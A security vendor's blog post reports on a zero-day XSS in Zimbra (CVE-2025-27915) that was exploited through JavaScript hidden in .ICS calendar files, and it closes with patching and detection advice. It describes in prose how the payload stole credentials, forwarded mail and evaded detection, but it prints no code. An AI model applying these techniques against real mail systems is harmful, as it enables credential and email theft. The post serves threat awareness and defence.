At TecnetOne, we want to keep you informed about the latest cybersecurity threats so you can better protect your digital infrastructure. This time, the focus is on Zimbra Collaboration Suite (ZCS), a widely used platform for email and business collaboration, which was recently targeted in a rather stealthy zero-day attack.
It all began when researchers detected unusually large calendar files with the .ICS extension. These files (commonly known as iCalendar) are standard formats used for scheduling meetings, events, or tasks, and are easily exchanged between applications like Outlook, Google Calendar, or Apple Calendar.
What’s concerning is that malicious actors managed to use these files as a vehicle for an attack. They exploited a vulnerability identified as CVE-2025-27915, a cross-site scripting (XSS) flaw present in Zimbra versions 9.0, 10.0, and 10.1. Through this flaw, attackers injected JavaScript code into .ICS files and sent them to targeted systems. The result? They could execute malicious scripts directly in the victim’s browser—without raising suspicion.
The root of the vulnerability lies in poor validation of HTML content within .ICS files. This flaw allowed attackers to execute malicious JavaScript directly in the user's session, giving them the ability to, for example, create filters that redirected emails to accounts under their control.
Zimbra addressed this security gap on January 27 by releasing patches for ZCS versions 9.0.0 P44, 10.0.13, and 10.1.5. However, the official announcement did not mention that the vulnerability was already being actively exploited.
Shortly thereafter, it was discovered that attackers had started leveraging this flaw as early as January, weeks before the patch was made available. The key clue emerged from analyzing .ICS files larger than 10 KB, which contained hidden JavaScript code fragments—highly unusual for this type of file.
In one of the detected campaigns, the threat actor impersonated the Protocol Office of the Libyan Navy through a seemingly legitimate email that included a zero-day exploit targeting a military organization in Brazil. A carefully crafted attack that demonstrates the sophistication and targeted nature of these threats.
Malicious Email Sent by the Attackers (Source: StrikeReady)
The malicious email included an almost empty .ICS file (0 KB), but with a hidden surprise inside: obfuscated JavaScript code using Base64 encoding—a common technique to conceal the true intent of the code and evade detection systems.
Deobfuscating the JavaScript Payload
Read more: XWorm: The Malware That Returns with Ransomware and Over 35 Plugins
After analyzing the infected file, researchers discovered that the payload was specifically designed to steal sensitive data from Zimbra Webmail. Among the compromised information were login credentials, emails, contacts, and even shared folders.
The JavaScript code used was highly sophisticated. It was obfuscated using Base64 and executed asynchronously, leveraging functions that automatically trigger on load (known as IIFE, or Immediately Invoked Function Expressions). This gave the malware stealthy behavior that was difficult to detect.
Create hidden fields to capture usernames and passwords.
Steal credentials directly from login forms.
Monitor user activity (mouse and keyboard movements) and log out the session after a period of inactivity to trigger data theft.
Use Zimbra's SOAP API to search for folders and extract emails.
Exfiltrate emails to the attacker, repeating the process every 4 hours.
Create a filter named “Mail” that forwards all incoming messages to an external address (in this case, a ProtonMail account).
Steal and send copies of authentication and backup data.
Extract contacts, distribution lists, and shared folders from the compromised user.
Introduce a 60-second delay before executing the script to avoid suspicion.
Apply a 3-day “time gate” to ensure it doesn’t run again until that period has passed, maintaining a low profile.
Hide certain visual elements in the Zimbra user interface, reducing visible signs that something is wrong.
This is not a generic attack. It’s surgically designed to operate undetected, extract critical information, and maintain persistence within the victim's system.
While the attack has not been definitively attributed to a specific group, researchers agree that very few actors have the capability to discover and exploit zero-day vulnerabilities in widely used platforms like Zimbra.
Although no official attribution has been made, a Russian-origin group with a history of similar advanced campaigns has been mentioned. Moreover, some of the tactics, techniques, and procedures (TTPs) observed align with those previously used by UNC1151, a threat group linked to the Belarusian government according to earlier industry reports.
Read more: Most Exploited Zero-Day Vulnerabilities in 2025
At TecnetOne, we always recommend acting proactively at the first sign of suspicious activity—even if attacks haven’t yet spread on a large scale. Prevention remains the best defense.
To protect your systems against this type of advanced threat, we suggest taking the following key measures:
Review existing mail filters for unusual rules or unauthorized changes that may be covertly forwarding messages.
Ensure you are running the latest version of your email and collaboration platform. Security patches addressing this vulnerability are already available and should be applied as soon as possible.
Inspect your message store and analyze any .ICS files containing Base64-encoded content. These types of files are uncommon and could be hiding malicious payloads.
Monitor network traffic, especially outbound connections to unknown or unusual external servers, as these may indicate data exfiltration or other malicious activity.
At TecnetOne, we’re committed to helping you keep your systems secure and up to date. Our team is ready to advise you, review your environments, and assist with implementing effective protection measures against threats like this one. If you have any questions or need support, don’t hesitate to contact us.